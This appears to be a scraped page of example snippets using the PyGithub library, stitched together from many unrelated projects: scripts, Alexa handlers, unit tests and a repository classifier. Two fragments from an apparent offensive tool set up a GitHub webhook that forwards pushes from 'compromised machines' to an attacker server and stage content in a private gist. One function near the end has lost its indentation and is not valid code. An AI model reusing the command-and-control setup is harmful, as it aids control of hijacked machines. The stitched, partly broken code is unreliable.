def main():
    """Print the repositories starred by a GitHub user.

    The user is taken from ``-u/--username`` and defaults to
    ``GITHUB_USERNAME``. The API client itself always logs in with
    ``GITHUB_USERNAME`` / ``GITHUB_PASS``, whichever user is listed.
    """
    cli = ArgumentParser(description="Show a user's Github stars")
    cli.add_argument(
        '-u', '--username',
        help='Github Username',
        type=str,
        default=GITHUB_USERNAME,
    )
    target = cli.parse_args().username

    client = Github(GITHUB_USERNAME, GITHUB_PASS)
    line_template = u"{} ({}) @ {}"
    # One output line per starred repo: full name, description, web URL.
    for starred in client.get_user(target).get_starred():
        print(line_template.format(
            starred.full_name, starred.description, starred.html_url))
python类Github()的实例源码
def search(self, query):
    """Search GitHub repositories and dump their stargazer records as JSON.

    Repositories matching ``query`` are requested sorted by stars. For every
    (language, stargazer) pair of every repository one record with the keys
    ``repo_id``, ``language_id``, ``stargazer_id`` and ``time_value`` is
    collected. The records are written as indented, key-sorted JSON to the
    path returned by ``self.get_path("json_input.json")``.

    :param query: search string handed to ``Github.search_repositories``.
    """
    gh = Github(self.token)
    data = []
    for repo in gh.search_repositories(query, sort='stars'):
        languages = repo.get_languages().keys()
        stargazers = repo.get_stargazers_with_dates()
        for lang in languages:
            for stargazer in stargazers:
                # Build a fresh dict per record. Re-using one dict and
                # appending it repeatedly makes every list entry alias the
                # same object, so all records end up with the last values.
                data.append({
                    "repo_id": repo.id,
                    "language_id": lang,
                    "stargazer_id": stargazer.user.id,
                    # NOTE(review): "%H:%S" emits hour:second and skips the
                    # minutes - confirm whether "%H:%M:%S" was intended.
                    "time_value": stargazer.starred_at.strftime("%Y-%m-%dT%H:%S"),
                })

    # Open the output only once the data is complete; the context manager
    # guarantees the handle is flushed and closed.
    with open(self.get_path("json_input.json"), "w") as json_input:
        json_input.write(json.dumps(data, indent=4, sort_keys=True))
def create_private_gist(config, main_github_token, filename, content, description):
    """Create a single-file gist and record its shortened raw URL.

    The gist is created for the user authenticated by ``main_github_token``
    with ``False`` as ``create_gist``'s first argument (PyGithub's ``public``
    flag). The resulting URL is stored under
    ``config["gist_raw_contents_url"]``, printed, and ``config`` is returned.
    """
    client = Github(main_github_token)
    account = client.get_user()
    files = {filename: github.InputFileContent(content)}
    gist = account.create_gist(False, files, description)

    url_key = "gist_raw_contents_url"

    # gist.files maps file names to GistFile objects; only one file was
    # uploaded, so the first value is the one we want.
    first_file = list(gist.files.values())[0]
    config[url_key] = first_file.raw_url

    # The raw URL looks like
    #   https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt>
    # With a single file, everything after /raw/ can be dropped and the URL
    # still resolves to the content, which keeps it as short as possible.
    trimmed, _, _ = config[url_key].partition("/raw/")
    config[url_key] = trimmed + "/raw"

    print("[*] Private gist content at:")
    print("- %s" % config[url_key])
    return config
# Return the content that will be placed in the private gist
def create_c2_webhook(config):
    """Create a push webhook on the configured repository and return its secret.

    Reads ``main_github_token``, ``github_c2_repo_name`` and
    ``attacker_server`` from ``config``. A random UUID is generated as the
    hook secret. If ``create_hook`` raises, the first existing hook is edited
    instead: when it already has a secret the user is prompted for it,
    otherwise the generated secret is installed.

    NOTE(review): the bare ``except`` together with ``return`` inside
    ``finally`` means no exception ever leaves this function, including
    failures while editing the existing hook. Kept as-is to preserve
    behaviour.
    """
    print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ")

    client = Github(config["main_github_token"])
    repo = client.get_user().get_repo(config["github_c2_repo_name"])

    # this endpoint is defined in server/gitpwnd/controllers.py
    endpoint = config["attacker_server"] + "/api/repo/receive_branch"

    # We're using a self-signed cert, so TLS verification is turned off for now.
    # See: https://developer.github.com/v3/repos/hooks/#create-a-hook
    hook_secret = str(uuid.uuid4())
    params = dict(url=endpoint, content_type="json", secret=hook_secret, insecure_ssl="1")

    # PyGithub's create_hook doc:
    # http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook
    try:
        repo.create_hook("web", params, ["push"], True)
    except:
        print("[!] Web hook already exists")
        existing = repo.get_hooks()[0]
        if "secret" in existing.config:
            hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ")
        else:
            print("[!] Adding a secret to the hook...")
        updated_config = existing.config
        updated_config["secret"] = hook_secret
        existing.edit(name=existing.name, config=updated_config)
    finally:
        return hook_secret
# Automatically generate a new password for the gitpwnd server
# so we don't use a default one
def __init__(self):
    """Load the client secrets file and build the GitHub client.

    ``is_appengine_local()`` selects between the debug and the regular
    constants for the secrets file, the crash reporter host and the
    ``owner/repo`` name. The webhook secret and the API token are read from
    the parsed JSON secrets.
    """
    secrets_path = DEBUG_CLIENT_SECRETS if is_appengine_local() else CLIENT_SECRETS
    with open(secrets_path, 'r') as handle:
        secrets = json.load(handle)

    self.webhook_secret = secrets.get(WEBHOOK_SECRET)

    if not is_appengine_local():
        self.reporter_host = CRASH_REPORTER_HOST
        owner, repo = OWNER, REPO
    else:
        self.reporter_host = DEBUG_CRASH_REPORTER_HOST
        owner, repo = DEBUG_OWNER, DEBUG_REPO
    self.repo_name = '{0}/{1}'.format(owner, repo)

    self.github_client = Github(login_or_token=secrets.get(TOKEN_KEY))
def __init__(self, config, agentid, issue):
    """Store the agent settings and resolve the GitHub issue to work on.

    :param config: object whose ``github()`` call returns a mapping with the
        keys ``git_user_name``, ``git_app_token``, ``git_repo_name``,
        ``git_rlimit`` and ``git_comm_limit``.
    :param agentid: stored unchanged on ``self.agentid``.
    :param issue: identifier handed to ``get_issue`` on the repository.
    """
    self.config = config
    self.agentid = agentid
    self.issue = issue

    # Copy each GitHub setting onto its attribute, in the original order.
    setting_map = (
        ('ghuser_name', 'git_user_name'),
        ('ghtoken', 'git_app_token'),
        ('ghrepo_name', 'git_repo_name'),
        ('gh_rlimit', 'git_rlimit'),
        ('ghcomm_limit', 'git_comm_limit'),
    )
    for attribute, key in setting_map:
        setattr(self, attribute, config.github()[key])

    # Walk client -> authenticated user -> repository -> issue.
    self.gh = Github(self.ghuser_name, self.ghtoken)
    self.ghuser = self.gh.get_user()
    self.ghrepo = self.ghuser.get_repo(self.ghrepo_name)
    self.ghissue = self.ghrepo.get_issue(self.issue)
def update_organisation_repos(organisation, token, filename, excludes, include_forks):
    """Write the clone URLs of an organisation's public repos to a file.

    Repositories are requested with ``get_repos("public")``. Forks are
    dropped unless ``include_forks`` is truthy, and the clone URLs are passed
    through ``filter_excluded_repos`` with ``excludes`` before being written
    to ``filename``. Progress messages go through ``printerr``.
    """
    org = Github(token).get_organization(organisation)
    printerr("Looking up {org} repositories (may take some time)".format(org=organisation))

    candidates = org.get_repos("public")
    if include_forks:
        selected = candidates
    else:
        selected = (candidate for candidate in candidates if not candidate.fork)

    urls = filter_excluded_repos(_clone_urls(selected), excludes)
    with open(filename, "w") as out:
        _write_repo_list(urls, out)
    printerr("Wrote list of repositories to {location}".format(location=filename))
def get_repository():
    """Return the repository named in the settings, creating it if missing.

    The repo is looked up under ``app_settings.GITHUB_ORG`` when that is set,
    otherwise under the authenticated user. An ``UnknownObjectException``
    from the lookup triggers creation of the repo. Any other
    ``GithubException`` is logged and ``None`` is returned.
    """
    try:
        client = Github(**get_github_credentials())
        org_name = app_settings.GITHUB_ORG
        owner = client.get_organization(org_name) if org_name else client.get_user()
        repo_name = app_settings.GITHUB_REPO
        try:
            return owner.get_repo(repo_name)
        except UnknownObjectException:
            logging.info("Creating repository {}".format(repo_name))
            return owner.create_repo(repo_name)
    except GithubException:
        logging.exception("Unable to configure Github connection.")
    return None
def __init__(self, config, assets):
    """Set up the 'Upload the release' step and its two substeps.

    :param config: stored on ``self.config``.
    :param assets: stored on ``self.assets``.
    """
    # Inputs
    self.config, self.assets = config, assets
    self.newassets = []

    # GitHub API handles, all unset at construction time.
    self.github = self.githubuser = self.githubrepo = self.release = None

    # Register the substeps with the parent Step.
    substeps = (
        Substep('Configure HTTPS download server', self.substep1),
        Substep('Upload to Github', self.substep2),
    )
    Step.__init__(self, 'Upload the release', *substeps)
def substep2(self):
    """Create the GitHub release if needed, then upload every new asset."""
    cfg = self.config

    # Create the release only when none has been set yet.
    if self.release is None:
        tag = cfg['tag']
        release_name = cfg['project'] + ' ' + tag
        self.release = self.githubrepo.create_git_release(
            tag, release_name, cfg['message'],
            draft=False, prerelease=cfg['prerelease'])

    # Upload assets from the configured output directory.
    for asset_name in self.newassets:
        asset_path = os.path.join(self.config['output'], asset_name)
        self.verbose('Uploading {}'.format(asset_path))
        # TODO not functional
        # see https://github.com/PyGithub/PyGithub/pull/525#issuecomment-301132357
        self.release.upload_asset(asset_path)
def create_or_update_comment(self, message):
    """Post ``message`` as a comment on the pull request, or update it.

    Nothing happens when ``message`` is empty. When
    ``self._get_existing_comment()`` returns a comment, it is edited only if
    its body differs from ``message``. Otherwise a new issue comment is
    created on ``self._pr``.

    :param message: the comment text to publish.
    """
    # see: https://github.com/blog/2178-multiple-assignees-on-issues-and-pull-requests
    # see: https://github.com/PyGithub/PyGithub/issues/404
    if message:
        current = self._get_existing_comment()
        if not current:
            self._pr.create_issue_comment(message)
        elif current.body != message:
            current.edit(message)
def __init__(self, index='codetoname', page_num=0, page_size=30,
             language='python', account=None, password=None):
    """Set up the Elasticsearch and GitHub clients and start the first search.

    :param index: Elasticsearch index name, stored on ``self._es_index``.
    :param page_num: stored on ``self._page_num``.
    :param page_size: stored on ``self._page_size`` and used as the GitHub
        client's ``per_page``.
    :param language: stored on ``self._language``.
    :param account: GitHub login; used only together with ``password``.
    :param password: GitHub password; used only together with ``account``.
    """
    self._es = elasticsearch.Elasticsearch()
    self._es_index = index
    self._page_num = page_num
    self._page_size = page_size
    self._language = language
    self._total_page_num = 0

    # Fall back to an anonymous client unless both credentials are present.
    if not (account and password):
        client = github.Github(per_page=page_size)
    else:
        client = github.Github(account, password, per_page=page_size)
        print('Hi, {}'.format(client.get_user().name))
    self._github_client = client

    self._github_response = None
    self._latest_repo_updated = None
    self._latest_repo_index = False
    self._update_searching_response()
async def test__when_comment_data_is_valid__should_send_it_to_proper_github_endpoint(self):
    """handle_comment creates the commit comment and answers 200 'Comment ACK'.

    Declared ``async`` because the body awaits the controller; ``await``
    inside a plain ``def`` is a SyntaxError.
    """
    proper_data = {'repository': 'repo', 'sha': '123abc', 'body': 'Comment body', 'jobName': 'job'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request)
    github_client = mock(spec=github.Github)
    github_repository = mock(spec=github.Repository)
    github_commit = mock(spec=github.Commit)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(proper_data))
    when(CommentRequestData).is_valid_comment_data(proper_data).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_commit('123abc').thenReturn(github_commit)
    when(github_commit).create_comment(body='job\nComments: Comment body')

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)

    # then
    assert response.status == 200
    assert response.text == 'Comment ACK'
async def test__when_status_data_is_ok__should_call_github_client_to_create_status(self):
    """handle_status creates the commit status and answers 200 'Status ACK'.

    Declared ``async`` because the body awaits the controller; ``await``
    inside a plain ``def`` is a SyntaxError.
    """
    proper_data = {'repository': 'repo', 'sha': '123abc', 'state': 'State', 'description': 'Description', 'context': 'Context', 'url': 'pr_url'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
    github_client = mock(spec=github.Github, strict=True)
    github_repository = mock(spec=github.Repository, strict=True)
    github_commit = mock(spec=github.Commit, strict=True)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(proper_data))
    when(StatusRequestData).is_valid_status_data(proper_data).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    when(github_repository).get_commit('123abc').thenReturn(github_commit)
    when(github_commit).create_status(state='State', description='Description', target_url='pr_url', context='Context')

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_status(request)

    # then
    assert response.status == 200
    assert response.text == 'Status ACK'
async def test__when_github_entity_is_not_found__comment_should_return_404_response_with_github_explanation(self):
    """A 404 GithubException from get_commit becomes a 404 response.

    The response reason must equal the string form of the exception data.
    Declared ``async`` because the body awaits the controller; ``await``
    inside a plain ``def`` is a SyntaxError.
    """
    parameters = {'repository': 'repo', 'sha': 'null', 'body': 'Comment body', 'jobName': 'job'}

    request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
    github_client = mock(spec=github.Github, strict=True)
    github_repository = mock(spec=github.Repository, strict=True)

    pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)

    # given
    when(request).json().thenReturn(async_value(parameters))
    when(CommentRequestData).is_valid_comment_data(parameters).thenReturn(True)
    when(github_client).get_repo('repo').thenReturn(github_repository)
    github_exception_data = {'message': 'Not Found', 'documentation_url': 'https://developer.github.com/v3/'}
    when(github_repository).get_commit('null').thenRaise(github.GithubException(404, github_exception_data))

    # when
    response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)

    # then
    assert response.status == 404
    assert response.reason == str(github_exception_data)
async def test__when_setting_pr_sync_label__if_github_raises_more_then_3_times__timeout_error_should_be_raised(self):
    """Repeated GithubExceptions end in a TriggearTimeoutError.

    ``get_repo`` is stubbed to raise twice before returning the repository,
    ``get_issue`` always raises, and ``asyncio.sleep(1)`` is stubbed so the
    retries do not wait. Declared ``async`` because the body awaits the
    controller; ``await`` inside a plain ``def`` is a SyntaxError.
    """
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    mock(spec=asyncio)

    # given
    when(github_client).get_repo('repo')\
        .thenRaise(github.GithubException(404, 'repo not found'))\
        .thenRaise(github.GithubException(404, 'repo not found'))\
        .thenReturn(github_repository)
    when(github_repository).get_issue(43)\
        .thenRaise(github.GithubException(404, 'repo not found'))
    when(asyncio).sleep(1)\
        .thenReturn(async_value(None))\
        .thenReturn(async_value(None))\
        .thenReturn(async_value(None))

    # when / then
    with pytest.raises(TriggearTimeoutError) as timeout_error:
        await github_controller.set_pr_sync_label_with_retry('repo', 43)
    # Checked after the context manager exits; statements placed after the
    # raising call inside the block would never run.
    assert str(timeout_error.value) == 'Failed to set label on PR #43 in repo repo after 3 retries'
async def test__when_setting_pr_sync_label__if_github_returns_proper_objects__pr_sync_label_should_be_set(self):
    """With working stubs the 'triggear-pr-sync' label is added exactly once.

    Declared ``async`` because the body awaits the controller; ``await``
    inside a plain ``def`` is a SyntaxError.
    """
    github_client: github.Github = mock(spec=github.Github, strict=True)
    github_controller = GithubController(github_client, mock(), mock(), mock())
    github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    github_issue: github.Issue.Issue = mock(spec=github.Issue.Issue, strict=True)

    # given
    when(github_client).get_repo('repo')\
        .thenReturn(github_repository)
    when(github_repository).get_issue(43)\
        .thenReturn(github_issue)
    expect(github_issue, times=1)\
        .add_to_labels('triggear-pr-sync')

    # when
    result = await github_controller.set_pr_sync_label_with_retry('repo', 43)

    # then
    assert result is None
def test__when_get_repo_labels_is_called__only_label_names_are_returned(self):
    """get_repo_labels returns the names of the repository's labels, in order."""
    label_names = ['label', 'other_label']

    client: github.Github = mock(spec=github.Github, strict=True)
    repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    labels = [mock({'name': name}, spec=github.Label.Label, strict=True) for name in label_names]
    controller = GithubController(client, mock(), mock(), mock())

    # given
    when(client).get_repo('repo').thenReturn(repository)
    when(repository).get_labels().thenReturn(labels)

    # when
    result: List[str] = controller.get_repo_labels('repo')

    # then
    assert result == ['label', 'other_label']
def test__get_pr_labels__should_return_only_label_names(self):
    """get_pr_labels returns the names of the labels attached to the issue."""
    label_names = ['label', 'other_label']

    client: github.Github = mock(spec=github.Github, strict=True)
    repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
    issue_labels = [mock({'name': name}, spec=github.Label.Label, strict=True) for name in label_names]
    issue: github.Issue.Issue = mock({'labels': issue_labels}, spec=github.Issue.Issue, strict=True)
    controller = GithubController(client, mock(), mock(), mock())

    # given
    when(client).get_repo('repo').thenReturn(repository)
    when(repository).get_issue(25).thenReturn(issue)

    # when
    labels: List[str] = controller.get_pr_labels('repo', 25)

    # then
    assert ['label', 'other_label'] == labels
def main():
    """Print the closed issues of one milestone of the UNINETT/nav repo.

    The milestone is the one whose title equals the ``version`` argument.
    When none matches, a message is written to stderr and the process exits
    with status 1. Issues are printed in ascending issue-number order.
    """
    parser = ArgumentParser(description=__doc__)
    parser.add_argument("version")
    parser.add_argument("--token", "-t", type=str,
                        help="GitHub API token to use")
    args = parser.parse_args()

    # Anonymous access is used when no token is supplied.
    hub = Github(args.token) if args.token else Github()
    repo = hub.get_user('UNINETT').get_repo('nav')

    matching = [stone for stone in repo.get_milestones(state='all')
                if stone.title == args.version]
    if not matching:
        print("Couldn't find milestone for {}".format(args.version),
              file=sys.stderr)
        sys.exit(1)

    closed_issues = repo.get_issues(state='closed', milestone=matching[0])
    for issue in sorted(closed_issues, key=operator.attrgetter('number')):
        # NOTE(review): on Python 3 this prints the bytes repr (b'...');
        # confirm which interpreter this script targets.
        print(format_issue(issue).encode('utf-8'))
def get_orgs(intent, session):
    """Build a spoken response listing the user's GitHub organizations.

    The GitHub client is authenticated with
    ``session['user']['accessToken']``. Each organization is named by the
    last path segment of its ``url``. The response ends the session and has
    no reprompt text.
    """
    client = Github(session['user']['accessToken'])

    # Text after the final '/' of each org URL (the whole URL if no '/').
    names = [org.url.rsplit('/', 1)[-1] for org in client.get_user().get_orgs()]

    if names:
        speech_output = 'You belong to these organizations. ' + ','.join(names)
    else:
        speech_output = "You don't have any organizations in this account."

    speechlet = build_speechlet_response(intent['name'], speech_output, None, True)
    return build_response({}, speechlet)
def merge_pr(intent, session, dialog_state):
    """Merge a pull request named by the dialog slots and report the outcome.

    While ``delegate_slot_collection`` returns something other than
    ``intent``, that value is returned unchanged. Otherwise the
    ``REPONAME`` and ``PRNUMBER`` slot values identify the pull request,
    which is merged when GitHub reports it as mergeable.

    :param intent: the intent; ``intent['name']`` is used in the response.
    :param session: session dict holding ``['user']['accessToken']``.
    :param dialog_state: forwarded to ``delegate_slot_collection``.
    :return: the delegate response, or the built speech response.
    :raises ValueError: if the ``PRNUMBER`` slot value is not an integer.
    """
    filled_slots = delegate_slot_collection(intent, dialog_state)
    if intent != filled_slots:
        return filled_slots

    session_attributes = {}
    reprompt_text = None
    should_end_session = True

    repo_name = filled_slots['REPONAME']['value']
    pr_number = str(filled_slots['PRNUMBER']['value'])

    g = Github(session['user']['accessToken'])
    repo = g.get_repo(repo_name)
    # PyGithub's get_pull requires an int; the slot value was passed as-is.
    pr = repo.get_pull(int(pr_number))

    # `mergeable` is a property, not a method, and the original `mergable()`
    # spelling does not exist. It may be None while GitHub is still
    # computing it, which is treated as "cannot be merged".
    if pr.mergeable:
        pr.merge()
        speech_output = 'pull request ' + pr_number + ' merged.'
    else:
        speech_output = 'pull request ' + pr_number + ' cannot be merged.'

    return build_response(session_attributes, build_speechlet_response(
        intent['name'], speech_output, reprompt_text, should_end_session))
def __init__(self):
    """Create the GitHub client from the credentials in ``github.conf``.

    Reads ``username``, ``password`` and ``token`` from the ``DEFAULT``
    section. The token is preferred when present; otherwise username and
    password are used.

    :raises LookupError: when both username and token are empty.
    """
    parser = configparser.ConfigParser()
    parser.read("github.conf")
    username, password, token = (
        parser.get("DEFAULT", option)
        for option in ("username", "password", "token")
    )

    if not (username or token):
        logger.error("Username and Token is not filled in github.conf file. Please input login data.")
        raise LookupError("github.conf is not properly filled.")

    self.api = Github(token) if token else Github(username, password)
def main(argv=None, test=False):
    """Set a commit status on GitHub from docopt command-line options.

    Authenticates with ``--token`` when given, otherwise with
    ``--username`` and ``--password``.

    :param argv: argument list forwarded to ``docopt``.
    :param test: when truthy, the created status object is returned.
    :return: the created status if ``test`` is truthy, otherwise ``None``.
    :raises ValueError: when neither a token nor a username/password pair
        is supplied (previously this surfaced as an unbound-variable error).
    """
    arguments = docopt(__doc__, argv=argv)
    status = arguments['--status']
    commit = arguments['--commit-hash']
    user = arguments['--username']
    password = arguments['--password']
    token = arguments['--token']
    url = arguments['--url']
    repo = arguments['--repo']
    context = arguments['--context']
    description = arguments['--description']

    # print() with one parenthesised argument works on Python 2 and 3 alike.
    print("Setting status %s for commit %s." % (status, commit))

    if token:
        g = Github(token)
    elif user and password:
        g = Github(user, password)
    else:
        raise ValueError(
            "No credentials given: pass --token, or both --username and --password.")

    r = g.get_repo(repo)
    c = r.get_commit(commit)
    s = c.create_status(status, target_url=url, description=description, context=context)
    if test:
        return s
def main(argv=None, test=False):
    """Open a pull request on GitHub from docopt command-line options.

    ``--title`` and ``--description`` fall back to
    "Auto-generated pull request." when empty.

    :param argv: argument list forwarded to ``docopt``.
    :param test: when truthy, the created pull request is returned.
    :return: the created pull request if ``test`` is truthy, else ``None``.
    """
    arguments = docopt(__doc__, argv=argv)
    head = arguments['--head']
    base = arguments['--base']
    token = arguments['--token']
    repo = arguments['--repo']
    title = arguments['--title'] or "Auto-generated pull request."
    description = arguments['--description'] or "Auto-generated pull request."

    # print() with one parenthesised argument works on Python 2 and 3 alike;
    # the original print statement is a SyntaxError on Python 3.
    print("Pulling %s into %s in repo %s." % (head, base, repo))

    g = Github(token)
    r = g.get_repo(repo)
    p = r.create_pull(head=head, base=base, title=title, body=description)
    if test:
        return p
def _batch_worker(queue_input, queue_output):
    """Classify queued items with every classifier until the input runs dry.

    Each item is fetched with ``queue_input.get(True, 1)``. Every
    classifier's result is recorded under its name, and its per-class values,
    divided by the number of classifiers, are added to a running total. A
    tuple ``(data, best class, totals, per-classifier results)`` is put on
    ``queue_output``. On ``queue.Empty`` the process exits with status 0.
    """
    classifiers = classifier.get_all_classifiers()
    try:
        while True:
            data = queue_input.get(True, 1)
            totals = utility.get_zero_class_dict()
            per_classifier = dict()
            for clf in classifiers:
                scores = clf.classify(data)
                per_classifier[clf.name()] = scores
                for label in totals:
                    if label not in scores:
                        continue
                    totals[label] += scores[label] / len(classifiers)
            best = utility.get_best_class(totals)
            queue_output.put((data, best, totals, per_classifier))
    except queue.Empty:
        sys.exit(0)
##
# \brief Learning worker for parallel processing.
#
# \param input List of tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
# \param queue_classifier multiprocessing.Queue containing classifier objects for learning.
def result_to_file(result, filename):
    """Write one ``"<repo url> <class>"`` line per result entry to a file.

    :param result: iterable of entries where ``entry[0]`` offers
        ``get_repo_url()`` and ``entry[1]`` is written after it.
    :param filename: path of the file to (over)write.

    Ordinary errors are logged and swallowed, as before. KeyboardInterrupt
    and SystemExit now propagate instead of being caught by a bare
    ``except``.
    """
    try:
        with open(filename, 'w') as out:
            out.writelines(
                '{} {}\n'.format(entry[0].get_repo_url(), entry[1])
                for entry in result
            )
    except Exception:
        logging.error('Can not save results to {}'.format(filename))
##
# \brief Parses the files in a directory and returns input for learning.
#
# The directory has to contain one file with the name of each class ('DEV', 'HW', 'EDU', 'DOCS', 'WEB', 'DATA', 'OTHER')
# containing lines with repositories of that class.
#
# \param path Path to directory.
# \return List of tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
def _get_input(self, github_object):
try:
metadata = github_object.get_repository_data()
input = [
metadata['fork'],
True if metadata['homepage'] is not None else False,
metadata['size'],
metadata['stargazers_count'],
metadata['watchers_count'],
metadata['has_wiki'],
metadata['has_pages'],
metadata['forks_count'],
metadata['open_issues_count'],
metadata['subscribers_count']
]
return input
except github.GithubError:
return [0.0 for _ in range(10)]
##
# \brief Classifies the repository based on the learned <em>Decision Tree</em>.
#
# \param data GitHub repository as github.Github object.
# \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and
# PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def classify(self, data):
    """Return per-class probabilities for ``data`` from the stored tree.

    A zero class dict is returned, after logging an error, when the model
    config has no ``version`` entry or when that version differs from the
    running ``sklearn.__version__``. Otherwise the tree is lazily unpickled
    from the base64-encoded ``tree`` entry and queried with
    ``predict_proba`` on the features from ``self._get_input(data)``.
    """
    model_config = self._model.config
    if 'version' not in model_config:
        logging.error('Trying to use MetadataClassifier without learning first')
        return utility.get_zero_class_dict()

    trained_on = model_config['version']
    if trained_on != sklearn.__version__:
        logging.error('Using MetadataClassifier with different scikit learn version (trained on: {}, used: {}) - relearn classifier first'.format(trained_on, sklearn.__version__))
        return utility.get_zero_class_dict()

    if self._tree is None:
        # NOTE(review): pickle.loads runs arbitrary code from its input;
        # only load model configs from a trusted source.
        self._tree = pickle.loads(base64.b64decode(model_config['tree']))

    probability = self._tree.predict_proba([self._get_input(data)])
    result = utility.get_zero_class_dict()
    # Column i of the single probability row belongs to classes_[i].
    for column, label in enumerate(self._tree.classes_):
        result[label] = probability[0][column]
    return result
##
# \brief Trains a <em>Decision Tree</em> based on the provided repositories.
#
# \param learn List of tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
def classify(self, data):
    """Return a copy of the stored class dict for the repository's language.

    The language is read from ``data.get_repository_data()['language']``;
    ``None`` is looked up under the key ``'_None_'``. A zero class dict is
    returned when the lookup raises ``github.GithubError`` or when the
    language has no entry in the model config.
    """
    try:
        language = data.get_repository_data()['language']
    except github.GithubError:
        return utility.get_zero_class_dict()

    key = '_None_' if language is None else language
    if key not in self._model.config:
        return utility.get_zero_class_dict()
    return self._model.config[key].copy()
##
# \brief Learns the distribution of the languages based on the provided repositories.
#
# \param learn List of tuples (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.